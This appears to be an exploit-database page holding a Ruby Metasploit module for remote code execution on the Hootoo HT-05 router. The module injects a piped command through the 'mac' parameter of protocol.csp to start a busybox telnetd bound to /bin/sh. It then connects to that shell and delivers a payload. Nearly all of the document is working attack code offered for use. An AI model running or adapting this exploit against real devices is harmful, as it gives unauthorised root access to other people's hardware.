0day.today - Biggest Exploit Database in the World.
Hootoo HT-05 - Remote Code Execution Exploit
```ruby
require 'msf/core'
require 'net/http'
require "uri"

class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp

  #
  # Exploit description
  #
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Hootoo HT-05 remote shell exploit',
      'Description'    => %q{
        This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device
        This exploit was written by Andrei Manole. Version of the frimware 2.000.022. Tested on 2.00.0.82 -> it still works
      },
      'Author'         => 'Andrei Manole',
      'References'     => [ ],
      'Privileged'     => true,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType'    => 'cmd_interact',
              'ConnectionType' => 'find'
            }
        }, # end of payload settings
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => "20 Dicembre 2018",
      'DefaultTarget'  => 0))

    register_options([ Opt::RPORT(6666) ], self.class)
  end

  # send function
  def send_request(host,port)
    uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")
    http = Net::HTTP.new(uri.host, uri.port)
    request = Net::HTTP::Get.new(uri.request_uri)
    response = http.request(request)
    if response.code == 200 || response.message == 'OK' || response.class.name == 'HTTPOK' then
      return true
    end
    return false
  end

  # exploit
  def exploit
    print_status("[+] Apertura backdoor in corso...")
    # check the result of the send function, passing the values chosen by the
    # user through msf's datastore[]
    if !send_request(datastore['RHOST'],datastore['RPORT']) then
      raise("[-] Errore nel apertura della porta")
    end
    print_good("[+] Richiesta inviata con successo! :)")
    nsock = self.connect(false, {"RPORT" => datastore['RPORT']}) rescue nil # start the connection
    print_good("[+] Porta aperta con successo ! :)")
    # pass the payload to the /bin/sh listening on the port;
    # ">/dev/null 2>&1" discards standard output and redirects standard error to it
    nsock.put(payload.encoded + " >/dev/null 2>&1")
    handler(nsock)
    return
  end
end
```